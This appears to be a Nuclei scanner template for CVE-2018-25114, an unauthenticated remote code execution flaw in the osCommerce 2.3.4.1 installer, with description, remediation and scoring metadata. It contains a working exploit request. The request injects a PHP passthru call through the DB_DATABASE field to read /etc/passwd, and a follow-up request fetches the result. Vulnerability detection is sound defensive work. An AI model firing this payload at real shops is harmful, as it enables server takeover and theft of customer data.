id: CVE-2018-25114 info: name: osCommerce 2.3.4.1 - Remote Code Execution author: Suman_Kar severity: critical description: | osCommerce Online Merchant 2.3.4.1 contains a remote code execution caused by insecure default configuration and missing authentication in the installer workflow, letting unauthenticated attackers execute arbitrary PHP code via install_4.php, exploit requires accessible /install/ directory after installation. impact: | Unauthenticated attackers can execute arbitrary PHP code by exploiting the insecure installer workflow, leading to complete e-commerce platform compromise and access to customer data. remediation: | Remove the /install/ directory after installation and upgrade to a patched version of osCommerce. reference: - https://www.exploit-db.com/exploits/50128 - https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution - https://www.exploit-db.com/exploits/44374 - https://www.vulncheck.com/advisories/oscommerce-installer-unauth-config-file-injection-php-code-execution classification: cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N cve-id: CVE-2018-25114 cwe-id: CWE-94 epss-score: 0.78786 epss-percentile: 0.99077 metadata: verified: true max-request: 2 tags: cve,cve2018,rce,oscommerce,edb,vuln,vkev http: - raw: - | POST /install/install.php?step=4 HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A - | GET /install/includes/configure.php HTTP/1.1 Host: {{Hostname}} Accept: */* matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - type: status status: - 200 # digest: 4a0a0047304502205b6d9650f88262d053e4ba9b6d3e205aa7713320de14279ce02f10eb995cc86c022100f0027af2d90217d8a12b0289f4f9a58cc72ce35f5d0143ad62a4bb174ab299ca:922c64590222798bb761d5b6d8e72950